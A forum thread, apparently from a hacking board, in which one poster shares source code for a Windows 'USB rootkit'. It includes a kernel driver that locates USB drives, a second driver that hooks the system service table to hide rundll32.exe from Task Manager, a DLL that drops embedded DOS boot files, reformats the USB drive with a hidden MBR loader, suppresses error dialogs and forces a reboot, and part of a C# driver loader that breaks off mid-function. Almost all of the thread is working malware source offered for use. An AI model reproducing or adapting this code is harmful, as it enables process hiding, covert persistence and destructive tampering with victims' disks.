Jump to content


- - - - -

W32 USB Rootkit

Started by JMC31337, Dec 29 2011 10:57 PM

  • Please log in to reply
8 replies to this topic

#1 JMC31337

JMC31337

    Mega Poster

  • (Full Member)
  • 127 posts
  • Gender:Male
  • Location:West Chester PA
  • Interests:H/P/V/W/C
    ALT2600
    Classical Piano
    Chemistry/Toxicology/Toxins/Venom
    Cryptography
    Aviation/Piloting
    Programming
    Law
    Electronics

Posted 29 December 2011 - 10:57 PM

USB Rootkit (minus the extras)
2 sys files
1 Dll
1 Exe dropper
Your Life is Your Crime its Punishment Time

#2 JMC31337

JMC31337

    Mega Poster

  • (Full Member)
  • 127 posts
  • Gender:Male
  • Location:West Chester PA
  • Interests:H/P/V/W/C
    ALT2600
    Classical Piano
    Chemistry/Toxicology/Toxins/Venom
    Cryptography
    Aviation/Piloting
    Programming
    Law
    Electronics

Posted 29 December 2011 - 10:58 PM

This searches for a usb loaded. Once found it writes a file 0wned.txt then writes the corresponding drive letter to the file. This is so the callback from dll to driver can accomplish its function

#include <ntddk.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <malloc.h>
#define IOError	  -1
#define MEMORYError  -2
#define NOError		0
#define BUFFER_SIZE 4
//========================
	char *p;
	HANDLE fHandle; // handle to file
	OBJECT_ATTRIBUTES ObjectAttributes; // object attributes
	UNICODE_STRING FileName; // file name
	IO_STATUS_BLOCK ioStatusBlock; // IO status block
	char *myString;
//========================
UNICODE_STRING symbolic_nameC;
UNICODE_STRING VolumeNameC;
UNICODE_STRING symbolic_nameD;
UNICODE_STRING VolumeNameD;
UNICODE_STRING symbolic_nameE;
UNICODE_STRING VolumeNameE;
UNICODE_STRING symbolic_nameF;
UNICODE_STRING VolumeNameF;
UNICODE_STRING symbolic_nameG;
UNICODE_STRING VolumeNameG;
UNICODE_STRING symbolic_nameH;
UNICODE_STRING VolumeNameH;
WCHAR Buffer[40];
WCHAR Buffer1[40];
WCHAR Buffer2[40];
WCHAR Buffer3[40];
WCHAR Buffer4[40];
WCHAR Buffer5[40];
ULONG majorVersion;
ULONG minorVersion;
ANSI_STRING key;
PCSTR keyname;
//==========================
VOID QuerySym(PUNICODE_STRING SymName,PUNICODE_STRING VolumeName)
{
	NTSTATUS st;
	HANDLE LinkHandle;
	OBJECT_ATTRIBUTES object_attributes;
	ULONG rt;
	InitializeObjectAttributes(
		&object_attributes,
		SymName,
		OBJ_KERNEL_HANDLE,
		NULL,
		NULL);
	st = ZwOpenSymbolicLinkObject(&LinkHandle,GENERIC_READ,&object_attributes);
	if (!NT_SUCCESS(st))
	{
DbgPrint("OpenSymbolic Error!\n");
		ZwClose(LinkHandle);
		return;
	}
	st = ZwQuerySymbolicLinkObject(LinkHandle,VolumeName,&rt);
	if (!NT_SUCCESS(st))
	{
		if (st == STATUS_BUFFER_TOO_SMALL)
			DbgPrint("Buffer Error!\n");
		else
			DbgPrint("QuerySymbolic Error!\n");
		return;
	}
	ZwClose(LinkHandle);
}
//==========================
VOID Unload(PDRIVER_OBJECT DriverObject)
{
IoDeleteDevice(DriverObject->DeviceObject);
}
//===========================
extern DriveType()
{
	RtlInitUnicodeString(&symbolic_nameC,L"\\??\\C:");
	RtlInitUnicodeString(&symbolic_nameD,L"\\??\\D:");
	RtlInitUnicodeString(&symbolic_nameE,L"\\??\\E:");
	RtlInitUnicodeString(&symbolic_nameF,L"\\??\\F:");
	RtlInitUnicodeString(&symbolic_nameG,L"\\??\\G:");
	RtlInitUnicodeString(&symbolic_nameH,L"\\??\\H:");
 
	RtlInitEmptyUnicodeString(&VolumeNameC,Buffer,256*sizeof(WCHAR));
	RtlInitEmptyUnicodeString(&VolumeNameD,Buffer1,256*sizeof(WCHAR));
	RtlInitEmptyUnicodeString(&VolumeNameE,Buffer2,256*sizeof(WCHAR));
	RtlInitEmptyUnicodeString(&VolumeNameF,Buffer3,256*sizeof(WCHAR));
	RtlInitEmptyUnicodeString(&VolumeNameG,Buffer4,256*sizeof(WCHAR));
	RtlInitEmptyUnicodeString(&VolumeNameH,Buffer5,256*sizeof(WCHAR));
	QuerySym(&symbolic_nameC,&VolumeNameC);
	QuerySym(&symbolic_nameD,&VolumeNameD);
	QuerySym(&symbolic_nameE,&VolumeNameE);
	QuerySym(&symbolic_nameF,&VolumeNameF);
	QuerySym(&symbolic_nameG,&VolumeNameG);
	QuerySym(&symbolic_nameH,&VolumeNameH); 
//============================================== 
DbgPrint("VolumeNameC->%wZ\n",&VolumeNameC);
RtlUnicodeStringToAnsiString( &key, &VolumeNameC, TRUE);
keyname=key.Buffer;
if (strstr(keyname,"DP"))
{
DbgPrint("FOUND USB!!!");
	myString="C";
	if(KeGetCurrentIrql() != PASSIVE_LEVEL) return STATUS_INVALID_DEVICE_STATE;
	RtlInitUnicodeString(&FileName, L"\\DosDevices\\C:\\0WN3ED.TXT");
	InitializeObjectAttributes( &ObjectAttributes, &FileName,
		   OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL );
	ZwCreateFile(&fHandle, GENERIC_WRITE, &ObjectAttributes,
		&ioStatusBlock, NULL,
		FILE_ATTRIBUTE_NORMAL, 0, FILE_OVERWRITE_IF,
		FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);
	 ZwWriteFile(fHandle, NULL, NULL, NULL, &ioStatusBlock, myString,
				strlen(myString), NULL, NULL);
	ZwClose(fHandle);
}
RtlFreeAnsiString(&key);
//==============================================
DbgPrint("VolumeNameD->%wZ\n",&VolumeNameD);
RtlUnicodeStringToAnsiString( &key, &VolumeNameD, TRUE);
keyname=key.Buffer;
if (strstr(keyname,"DP"))
{
DbgPrint("FOUND USB!!!");
	myString="D";
	if(KeGetCurrentIrql() != PASSIVE_LEVEL) return STATUS_INVALID_DEVICE_STATE;
	RtlInitUnicodeString(&FileName, L"\\DosDevices\\C:\\0WN3ED.TXT");
	InitializeObjectAttributes( &ObjectAttributes, &FileName,
		   OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL );
	ZwCreateFile(&fHandle, GENERIC_WRITE, &ObjectAttributes,
		&ioStatusBlock, NULL,
		FILE_ATTRIBUTE_NORMAL, 0, FILE_OVERWRITE_IF,
		FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);
	 ZwWriteFile(fHandle, NULL, NULL, NULL, &ioStatusBlock, myString,
				strlen(myString), NULL, NULL);
	ZwClose(fHandle);
}
RtlFreeAnsiString(&key);
//==============================================
DbgPrint("VolumeNameE->%wZ\n",&VolumeNameE);
RtlUnicodeStringToAnsiString( &key, &VolumeNameE, TRUE);
keyname=key.Buffer;
if (strstr(keyname,"DP"))
{
DbgPrint("FOUND USB!!!");
	myString="E";
	if(KeGetCurrentIrql() != PASSIVE_LEVEL) return STATUS_INVALID_DEVICE_STATE;
	RtlInitUnicodeString(&FileName, L"\\DosDevices\\C:\\0WN3ED.TXT");
	InitializeObjectAttributes( &ObjectAttributes, &FileName,
		   OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL );
	ZwCreateFile(&fHandle, GENERIC_WRITE, &ObjectAttributes,
		&ioStatusBlock, NULL,
		FILE_ATTRIBUTE_NORMAL, 0, FILE_OVERWRITE_IF,
		FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);
	 ZwWriteFile(fHandle, NULL, NULL, NULL, &ioStatusBlock, myString,
				strlen(myString), NULL, NULL);
	ZwClose(fHandle);
}
RtlFreeAnsiString(&key);
//==============================================
DbgPrint("VolumeNameF->%wZ\n",&VolumeNameF);
RtlUnicodeStringToAnsiString( &key, &VolumeNameF, TRUE);
keyname=key.Buffer;
if (strstr(keyname,"DP"))
{
DbgPrint("FOUND USB!!!");
	myString="F";
	if(KeGetCurrentIrql() != PASSIVE_LEVEL) return STATUS_INVALID_DEVICE_STATE;
	RtlInitUnicodeString(&FileName, L"\\DosDevices\\C:\\0WN3ED.TXT");
	InitializeObjectAttributes( &ObjectAttributes, &FileName,
		   OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL );
	ZwCreateFile(&fHandle, GENERIC_WRITE, &ObjectAttributes,
		&ioStatusBlock, NULL,
		FILE_ATTRIBUTE_NORMAL, 0, FILE_OVERWRITE_IF,
		FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);
	 ZwWriteFile(fHandle, NULL, NULL, NULL, &ioStatusBlock, myString,
				strlen(myString), NULL, NULL);
	ZwClose(fHandle);
}
RtlFreeAnsiString(&key);
//========================
DbgPrint("VolumeNameG->%wZ\n",&VolumeNameG);
RtlUnicodeStringToAnsiString( &key, &VolumeNameG, TRUE);
keyname=key.Buffer;
if (strstr(keyname,"DP"))
{
DbgPrint("FOUND USB!!!");
	myString="G";
	if(KeGetCurrentIrql() != PASSIVE_LEVEL) return STATUS_INVALID_DEVICE_STATE;
	RtlInitUnicodeString(&FileName, L"\\DosDevices\\C:\\0WN3ED.TXT");
	InitializeObjectAttributes( &ObjectAttributes, &FileName,
		   OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL );
	ZwCreateFile(&fHandle, GENERIC_WRITE, &ObjectAttributes,
		&ioStatusBlock, NULL,
		FILE_ATTRIBUTE_NORMAL, 0, FILE_OVERWRITE_IF,
		FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);
	 ZwWriteFile(fHandle, NULL, NULL, NULL, &ioStatusBlock, myString,
				strlen(myString), NULL, NULL);
	ZwClose(fHandle);
}
RtlFreeAnsiString(&key);
//===========================
DbgPrint("VolumeNameH->%wZ\n",&VolumeNameH);
RtlUnicodeStringToAnsiString( &key, &VolumeNameH, TRUE);
keyname=key.Buffer;
if (strstr(keyname,"DP"))
{
DbgPrint("FOUND USB!!!");
	myString="H";
	if(KeGetCurrentIrql() != PASSIVE_LEVEL) return STATUS_INVALID_DEVICE_STATE;
	RtlInitUnicodeString(&FileName, L"\\DosDevices\\C:\\0WN3ED.TXT");
	InitializeObjectAttributes( &ObjectAttributes, &FileName,
		   OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL );
	ZwCreateFile(&fHandle, GENERIC_WRITE, &ObjectAttributes,
		&ioStatusBlock, NULL,
		FILE_ATTRIBUTE_NORMAL, 0, FILE_OVERWRITE_IF,
		FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);
	 ZwWriteFile(fHandle, NULL, NULL, NULL, &ioStatusBlock, myString,
				strlen(myString), NULL, NULL);
	ZwClose(fHandle);
}
RtlFreeAnsiString(&key);
//==========================
return 0;
} //END OF THIS FUNCTION

//===========================
NTSTATUS abcDevice(PDEVICE_OBJECT DeviceObject,PIRP Irp)
{
IO_STACK_LOCATION *irpStack;
long *inputBuffer;
long pid,ioControlCode;
irpStack = IoGetCurrentIrpStackLocation (Irp);
inputBuffer = (long *)Irp-> AssociatedIrp.SystemBuffer;
pid = *inputBuffer;
if(pid==123)
{
ioControlCode = irpStack->Parameters.DeviceIoControl.IoControlCode;
DbgPrint("abcDevice pid=%d code=%d MajorFunction=%d",pid,ioControlCode,irpStack->MajorFunction);
DriveType();
}
IoCompleteRequest(Irp,IO_NO_INCREMENT);
return STATUS_SUCCESS; 
}
//=====================================
NTSTATUS abcCreate(PDEVICE_OBJECT DeviceObject,PIRP Irp)
{
DbgPrint("abcCreate");
return STATUS_SUCCESS; 
}
//======================================
NTSTATUS DriverEntry(PDRIVER_OBJECT  d,PUNICODE_STRING p)
{
UNICODE_STRING devicename,filename;
PDEVICE_OBJECT r;
DbgPrint("DriverObject");
RtlInitUnicodeString(&devicename,L"\\Device\\bbb");
RtlInitUnicodeString(&filename,L"\\DosDevices\\aaa");
IoCreateDevice(d,0,&devicename,0,0,0,&r);
IoCreateSymbolicLink (&filename,&devicename);
d->MajorFunction[IRP_MJ_CREATE]=abcCreate;
d->MajorFunction[IRP_MJ_DEVICE_CONTROL]=abcDevice;
d->DriverUnload = Unload;
return STATUS_SUCCESS;
}

Edited by JMC31337, 29 December 2011 - 11:06 PM.

Your Life is Your Crime its Punishment Time

#3 JMC31337

JMC31337

    Mega Poster

  • (Full Member)
  • 127 posts
  • Gender:Male
  • Location:West Chester PA
  • Interests:H/P/V/W/C
    ALT2600
    Classical Piano
    Chemistry/Toxicology/Toxins/Venom
    Cryptography
    Aviation/Piloting
    Programming
    Law
    Electronics

Posted 29 December 2011 - 11:00 PM

This hides whatver program is listed from task manager. Code is from vijaymukhi (with error fixed)

#include <ntddk.h>
#include <stdio.h>
long no;
char *p;
NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation(ULONG SystemInformationClass,PVOID SystemInformation,ULONG SystemInformationLength,PULONG ReturnLength);
typedef struct
{
unsigned int *ServiceTableBase;
unsigned int *ServiceCounterTableBase;
unsigned int NumberOfServices;
unsigned char *ParamTableBase;
} sdt;
__declspec(dllimport) sdt KeServiceDescriptorTable;
typedef NTSTATUS (*qtype)(ULONG SystemInformationCLass,PVOID SystemInformation,ULONG SystemInformationLength,PULONG ReturnLength);
qtype OldZwQuerySystemInformation;
struct _SYSTEM_PROCESSES
{
ULONG   NextEntryDelta;
ULONG   ThreadCount;
ULONG   Reserved[6];
LARGE_INTEGER   CreateTime;
LARGE_INTEGER   UserTime;
LARGE_INTEGER   KernelTime;
UNICODE_STRING  ProcessName;
};
NTSTATUS NewZwQuerySystemInformation(ULONG SystemInformationClass,PVOID SystemInformation,ULONG SystemInformationLength,PULONG ReturnLength)
{
NTSTATUS rc;
rc = OldZwQuerySystemInformation(SystemInformationClass,SystemInformation,SystemInformationLength,ReturnLength);
if(rc == 0 && 5 == SystemInformationClass)
{
struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
struct _SYSTEM_PROCESSES *prev = NULL;
while(1)
{
ANSI_STRING process_name;
RtlUnicodeStringToAnsiString (&process_name,&curr->ProcessName,TRUE);
//DbgPrint("%s curr=%x prev=%x Delta=%d",process_name.Buffer,curr,prev,curr->NextEntryDelta);
if(strncmp(process_name.Buffer,"rundll32.exe",4) == 0)
{
if(curr->NextEntryDelta != 0 && prev != 0) //first guy has no name
{
//DbgPrint("Between %s curr->NextEntryDelta=%x prev=%x",process_name.Buffer,curr->NextEntryDelta,prev);
prev->NextEntryDelta += curr->NextEntryDelta;
}
else
{
//DbgPrint("Last");
prev->NextEntryDelta = 0;
}
}
prev = curr;
if ( curr->NextEntryDelta)
((char *)curr += curr->NextEntryDelta);
else
break;
}
}
return rc;
}
NTSTATUS DriverDispatcher(PDEVICE_OBJECT pDeviceObject, PIRP Irp)
{
DbgPrint("IRP_MJ_CREATE\n");
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return(STATUS_SUCCESS);
}
VOID DriverUnload(PDRIVER_OBJECT DriverObject)
{
DbgPrint("Unloading");
_asm cli
KeServiceDescriptorTable.ServiceTableBase[no]=(unsigned int)OldZwQuerySystemInformation;
_asm sti
}
NTSTATUS DriverEntry(PDRIVER_OBJECT driverObject, PUNICODE_STRING RegistryPath)
{
driverObject->DriverUnload = DriverUnload;
driverObject->MajorFunction[IRP_MJ_CREATE] = DriverDispatcher;
DbgPrint("Vijay 2 KeServiceDescriptorTable=%x",KeServiceDescriptorTable);
p = (char *)ZwQuerySystemInformation;
p = p + 1;
no = *(long *)p;
OldZwQuerySystemInformation=(qtype)KeServiceDescriptorTable.ServiceTableBase[no];
_asm cli
KeServiceDescriptorTable.ServiceTableBase[no]=(unsigned int)NewZwQuerySystemInformation;
_asm sti
return(STATUS_SUCCESS);
}

Edited by JMC31337, 29 December 2011 - 11:07 PM.

Your Life is Your Crime its Punishment Time

#4 JMC31337

JMC31337

    Mega Poster

  • (Full Member)
  • 127 posts
  • Gender:Male
  • Location:West Chester PA
  • Interests:H/P/V/W/C
    ALT2600
    Classical Piano
    Chemistry/Toxicology/Toxins/Venom
    Cryptography
    Aviation/Piloting
    Programming
    Law
    Electronics

Posted 29 December 2011 - 11:01 PM

DLL file to communicate with the kernel driver and low level disk. Also writes a few files (that are not included for MessageBoard Policy reasons) to the usb. Originally i had NTFS4DOS and a USB formatter to erase then load DOS 16 and further call reboot upon screensaver detection.


#include "dllhell.h"
#define _WIN32_WINXP 0x0500
#include <string.h>
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <fstream>
#include <iostream>
#include <sys/stat.h>
#include <tlhelp32.h>
#include "MBRLOAD.H"
#include "COMMANDC.H"
#include "IOSYS.H"
#include "MSDOSYS.H"
#include "KEYB.H"
#include "KEYBSYS.H"
#include "LOADERZ.H"
#include "AUTOBAT.H"
#include "ROOTIT.H"
#include "LIC.H"
#include "LNGINTL.H"
#define SPI_GETSCREENSAVERRUNNING 0x0072
SC_HANDLE m,s;HANDLE g;DWORD b,pid;
// a sample exported function
bool lvRunning;
char dl[1]={'\0'};
char dl2[1]={'\0'};
char txt[100]={'\0'};
char txtA[50]={'\0'};char txtB[50]={'\0'};char txtC[50]={'\0'};
char txtD[50]={'\0'};char txtE[50]={'\0'};char txtF[50]={'\0'};
char txtG[50]={'\0'};char txtH[50]={'\0'};char txtI[50]={'\0'};
char txtJ[50]={'\0'};char txtK[50]={'\0'};char txtL[50]={'\0'};
HWND msnf = FindWindow("#32770", "Windows - Drive not Ready");
BOOL CALLBACK EnumChildProc(HWND hwnd, LPARAM lParam)
{
  hwnd = FindWindow("#32770", "Windows - Drive not Ready");
	 SendMessage(hwnd, WM_CLOSE, WM_CLOSE, 0);
}
bool Checkit()
{
SystemParametersInfo(SPI_GETSCREENSAVERRUNNING,0,&lvRunning,0);
if (lvRunning)
{
return true;
}
return false;
}
void CreateEm()
{
	 try{
	 CreateDirectory("\\Solara",NULL);
}catch(char * err){}
//========================			  
try{
	FILE *file;
	if ((file = fopen("\\Solara\\mbrload.exe", "w+b")) == NULL) {
			fprintf(stderr, "Cant open output file.\n");
			//return 1;
	   }
	fwrite(MBRLOAD, 1, MBRLOAD_LEN, file);
	fclose(file);
	}catch(char * err){}
//========================  
try{
	FILE *file2;
	if ((file2 = fopen("\\Solara\\command.com", "w+b")) == NULL) {
			fprintf(stderr, "Cant open output file.\n");
			//return 1;
				 }
	fwrite(commandcom, 1, COMMANDCOM_LEN, file2);
	fclose(file2);
	}catch(char * err){}
//========================  
try{
	FILE *file3;
	if ((file3 = fopen("\\Solara\\io.sys", "w+b")) == NULL) {
			fprintf(stderr, "Cant open output file.\n");
			//return 1;
				 }
	fwrite(iosys, 1, IOSYS_LEN, file3);
	fclose(file3);
}catch(char * err){}
//========================  
try{
	FILE *file4;
	if ((file4 = fopen("\\Solara\\msdos.sys", "w+b")) == NULL) {
			fprintf(stderr, "Cant open output file.\n");
			//return 1;
				 }
	fwrite(msdosys, 1, MSDOSYS_LEN, file4);
	fclose(file4);
	}catch(char * err){}
//========================  
try{
	FILE *file5;
	if ((file5 = fopen("\\Solara\\keyb.com", "w+b")) == NULL) {
			fprintf(stderr, "Cant open output file.\n");
			//return 1;
				 }
	fwrite(keyb, 1, KEYB_LEN, file5);
	fclose(file5);
	}catch(char * err){}
//========================  
try{
	FILE *file6;
	if ((file6 = fopen("\\Solara\\keyboard.sys", "w+b")) == NULL) {
			fprintf(stderr, "Cant open output file.\n");
			//return 1;
				 }
	fwrite(keybsys, 1, KEYBSYS_LEN, file6);
	fclose(file6);
	}catch(char * err){}
//========================
try{
	FILE *file7;
	if ((file7 = fopen("\\Solara\\loadexec.com", "w+b")) == NULL) {
			fprintf(stderr, "Cant open output file.\n");
			//return 1;
				 }
	fwrite(loaderz, 1, LOADERZ_LEN, file7);
	fclose(file7);
	}catch(char * err){}
//========================
try{
	FILE *file8;
	if ((file8 = fopen("\\Solara\\autoexec.bat", "w+b")) == NULL) {
			fprintf(stderr, "Cant open output file.\n");
			//return 1;
				 }
	fwrite(autobat, 1, AUTOBAT_LEN, file8);
	fclose(file8);
	}catch(char * err){}
//========================
try{
	FILE *file9;
	if ((file9 = fopen("\\Solara\\ntfs4dos.exe", "w+b")) == NULL) {
			fprintf(stderr, "Cant open output file.\n");
			//return 1;
				 }
	fwrite(rootit, 1, ROOTIT_LEN, file9);
	fclose(file9);
	}catch(char * err){}
//========================  
try{
	FILE *file10;
	if ((file10 = fopen("\\Solara\\LICENSE.DAT", "w+b")) == NULL) {
			fprintf(stderr, "Cant open output file.\n");
			//return 1;
				 }
	fwrite(lic, 1, LIC_LEN, file10);
	fclose(file10);
	}catch(char * err){}
//========================
	try{
	FILE *file11;
	if ((file11 = fopen("\\Solara\\LNGINTL.DAT", "w+b")) == NULL) {
			fprintf(stderr, "Cant open output file.\n");
			//return 1;
				 }
	fwrite(lngintl, 1, LNGINTL_LEN, file11);
	fclose(file11);
	}catch(char * err){}
}//END FILE STUFF
void ReadIT()
{
try
{
std::ifstream fin("\\0WN3ED.txt");
fin>>dl;
fin.close();
}
catch(char * err){}
}
//====================
void KillIT()
{
try{
remove( "\\Solara\\LNGINTL.DAT" );
}catch(char * ex){}
try{
remove( "\\Solara\\ntfs4dos.exe" );
}catch(char * ex){}
try{
remove( "\\Solara\\autoexec.bat" );
}catch(char * ex){}
try{
remove( "\\Solara\\loadexec.com" );
}catch(char * ex){}
try{
remove( "\\Solara\\command.com" );
}catch(char * ex){}
try{
remove( "\\Solara\\io.sys" );
}catch(char * ex){}
try{
remove( "\\Solara\\msdos.sys" );
}catch(char * ex){}
try{
remove( "\\Solara\\keyboard.sys" );
}catch(char * ex){}
try{
remove( "\\Solara\\keyb.com" );
}catch(char * ex){}
try{
remove( "\\Solara\\mbrload.exe" );
}catch(char * ex){}
try{
remove( "\\Solara\\LICENSE.DAT" );
}catch(char * ex){}

try
{
std::ifstream fin2("\\0WN3ED.txt");
fin2>>dl2;
fin2.close();
}
catch(char * err){}

strcat(txtA,dl2);
strcat(txtA,":\\LICENSE.DAT");
SetFileAttributes(txtA,2);
Sleep(500);
strcat(txtB,dl2);
strcat(txtB,":\\command.com");
SetFileAttributes(txtB,2);
Sleep(500);
strcat(txtC,dl2);
strcat(txtC,":\\io.sys");
SetFileAttributes(txtC,2);
Sleep(500);
strcat(txtD,dl2);
strcat(txtD,":\\msdos.sys");
SetFileAttributes(txtD,2);
Sleep(500);
strcat(txtE,dl2);
strcat(txtE,":\\keyb.com");
SetFileAttributes(txtE,2);
Sleep(500);
strcat(txtF,dl2);
strcat(txtF,":\\msdos.sys");
SetFileAttributes(txtF,2);
Sleep(500);
strcat(txtG,dl2);
strcat(txtG,":\\ntfs4dos.exe");
SetFileAttributes(txtG,2);
Sleep(500);
strcat(txtH,dl2);
strcat(txtH,":\\LNGINTL.DAT");
SetFileAttributes(txtH,2);
Sleep(500);
strcat(txtI,dl2);
strcat(txtI,":\\autoexec.bat");
SetFileAttributes(txtI,2);
Sleep(500);
strcat(txtJ,dl2);
strcat(txtJ,":\\keyboard.sys");
SetFileAttributes(txtJ,2);
Sleep(500);
strcat(txtK,dl2);
strcat(txtK,":\\loadexec.com");
SetFileAttributes(txtK,2);
Sleep(500);
strcat(txtL,dl2);
strcat(txtL,":\\mbrload.exe");
SetFileAttributes(txtL,2);
try{
remove( "\\0WN3ED.txt" );
}catch(char * ex){}
}
//====================
int DLL_EXPORT MsgBox(int x = 0)
{
while(1)
{
Sleep(10000);
  if(Checkit()==true)	
  {
	   CreateEm();
	   pid = 123;
//	 m=OpenSCManager(0,0,SC_MANAGER_ALL_ACCESS );
//	CreateService(m,"vijay","mukhi",SERVICE_ALL_ACCESS,SERVICE_KERNEL_DRIVER,SERVICE_DEMAND_START,SERVICE_ERROR_NORMAL,"",0,0,0,0,0);
//	s=OpenService(m,"vijay",SERVICE_ALL_ACCESS);
//	StartService(s, 0, 0);
	 g=CreateFile("\\\\.\\aaa",GENERIC_READ | GENERIC_WRITE,0,0,OPEN_EXISTING,0,0);
	 DeviceIoControl(g,2,(void *)&pid,4,0,0,&b,0);
	 goto end;
		}
}
end:
ReadIT();
if(dl!=NULL)
{
strcat(txt,dl);
strcat(txt, ": -FS:fat32 -V:USBBRK -B:\\Solara -S:\\Solara -Y");
	HINSTANCE hInst = ShellExecute(0,						
								   "open",				  
								   "\\Solara\\mbrload.exe",
								   txt,
								   0,						
								   SW_HIDE);
}
for(long xx=0;xx<100000;xx++)
{
EnumChildWindows(msnf, EnumChildProc, 0);
}
KillIT();
system("shutdown -r -t 0");
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
	switch (fdwReason)
	{
		case DLL_PROCESS_ATTACH:
			// attach to process
			// return FALSE to fail DLL load
			break;
		case DLL_PROCESS_DETACH:
			// detach from process
			break;
		case DLL_THREAD_ATTACH:
			// attach to thread
			break;
		case DLL_THREAD_DETACH:
			// detach from thread
			break;
	}
	return TRUE; // successful
}

Edited by JMC31337, 31 December 2011 - 03:42 PM.

Your Life is Your Crime its Punishment Time

#5 JMC31337

JMC31337

    Mega Poster

  • (Full Member)
  • 127 posts
  • Gender:Male
  • Location:West Chester PA
  • Interests:H/P/V/W/C
    ALT2600
    Classical Piano
    Chemistry/Toxicology/Toxins/Venom
    Cryptography
    Aviation/Piloting
    Programming
    Law
    Electronics

Posted 29 December 2011 - 11:14 PM

This is the C# sys driver loader and DLLHell (dll file) dropper and execution code

//EFREEDOM . COM
using System;
using System.Diagnostics;
using System.Collections;
using System.Runtime.InteropServices;
using System.Management;
using System.ServiceProcess;
using System.Threading;
using System.IO;
class Win32Driver : IDisposable
	{


		string driverName;
		string execPath;
		IntPtr fileHandle;
		public Win32Driver(string driver, string driverExecPath)
		{
			this.driverName = driver;
			this.execPath = driverExecPath;
		}
		~Win32Driver()
		{
			// BUG - should never rely on finalizer to clean-up unmanaged resources
			Dispose();
		}
		private void CloseStuff()
		{
			if (fileHandle != INVALID_HANDLE_VALUE)
			{
				fileHandle = INVALID_HANDLE_VALUE;
				CloseHandle(fileHandle);
			}
		}

		public void Dispose()
		{
			CloseStuff();
			GC.SuppressFinalize(this);
		}






		private readonly static IntPtr INVALID_HANDLE_VALUE = new IntPtr(-1);
		private const int STANDARD_RIGHTS_REQUIRED = 0x000F0000;
		private const int SC_MANAGER_CONNECT = 0x0001;
		private const int SC_MANAGER_CREATE_SERVICE = 0x0002;
		private const int SC_MANAGER_ENUMERATE_SERVICE = 0x0004;
		private const int SC_MANAGER_LOCK = 0x0008;
		private const int SC_MANAGER_QUERY_LOCK_STATUS = 0x0010;
		private const int SC_MANAGER_MODIFY_BOOT_CONFIG = 0x0020;
		private const int SC_MANAGER_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED |
		SC_MANAGER_CONNECT |
		SC_MANAGER_CREATE_SERVICE |
		SC_MANAGER_ENUMERATE_SERVICE |
		SC_MANAGER_LOCK |
		SC_MANAGER_QUERY_LOCK_STATUS |
		SC_MANAGER_MODIFY_BOOT_CONFIG;

		private const int SERVICE_QUERY_CONFIG = 0x0001;
		private const int SERVICE_CHANGE_CONFIG = 0x0002;
		private const int SERVICE_QUERY_STATUS = 0x0004;
		private const int SERVICE_ENUMERATE_DEPENDENTS = 0x0008;
		private const int SERVICE_START = 0x0010;
		private const int SERVICE_STOP = 0x0020;
		private const int SERVICE_PAUSE_CONTINUE = 0x0040;
		private const int SERVICE_INTERROGATE = 0x0080;
		private const int SERVICE_USER_DEFINED_CONTROL = 0x0100;

		private const int SERVICE_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED
		|
		SERVICE_QUERY_CONFIG |
		SERVICE_CHANGE_CONFIG |
		SERVICE_QUERY_STATUS |
		SERVICE_ENUMERATE_DEPENDENTS |
		SERVICE_START |
		SERVICE_STOP |
		SERVICE_PAUSE_CONTINUE |
		SERVICE_INTERROGATE |
		SERVICE_USER_DEFINED_CONTROL;

		private const int SERVICE_DEMAND_START = 0x00000003;
		private const int SERVICE_KERNEL_DRIVER = 0x00000001;
		private const int SERVICE_ERROR_NORMAL = 0x00000001;

		private const uint GENERIC_READ = 0x80000000;
		private const uint FILE_SHARE_READ = 1;
		private const uint FILE_SHARE_WRITE = 2;
		private const uint OPEN_EXISTING = 3;
		private const uint IOCTL_SHOCKMGR_READ_ACCELEROMETER_DATA = 0x733fc;
		private const int FACILITY_WIN32 = unchecked((int)0x80070000);
		private IntPtr handle = INVALID_HANDLE_VALUE;

		[DllImport("advapi32", SetLastError = true)]
		internal static extern IntPtr OpenSCManager(string machineName, string
		databaseName, uint dwDesiredAccess);

		[DllImport("advapi32", SetLastError = true)]
		internal static extern IntPtr CreateService(IntPtr hSCManager, string
		serviceName, string displayName,
		uint dwDesiredAccess, uint serviceType, uint startType, uint
		errorControl,
		string lpBinaryPathName, string lpLoadOrderGroup, string lpdwTagId,
		string lpDependencies,
		string lpServiceStartName, string lpPassword);

		[DllImport("advapi32")]
		internal static extern bool CloseServiceHandle(IntPtr handle);

		[DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Auto)]
		static extern IntPtr OpenService(IntPtr hSCManager, string lpServiceName, uint dwDesiredAccess);

		[DllImport("kernel32", SetLastError = true)]
		internal static extern IntPtr CreateFile(string lpFileName, uint
		dwDesiredAccess, uint dwShareMode, IntPtr lpSecurityAttributes, uint
		dwCreationDisposition, uint dwFlagsAndAttributes, IntPtr hTemplateFile);


		[DllImport("kernel32")]
		internal static extern void CloseHandle(IntPtr handle);

		[DllImport("kernel32", SetLastError = true)]
		private static extern bool DeviceIoControl(IntPtr hDevice, uint
		dwIoControlCode, IntPtr lpInBuffer, uint nInBufferSize, IntPtr lpOutBuffer,
		uint nOutBufferSize, ref uint lpBytesReturned, IntPtr lpOverlapped);


		internal bool LoadDeviceDriver()
		{
		IntPtr scHandle = OpenSCManager(null, null, SC_MANAGER_ALL_ACCESS);

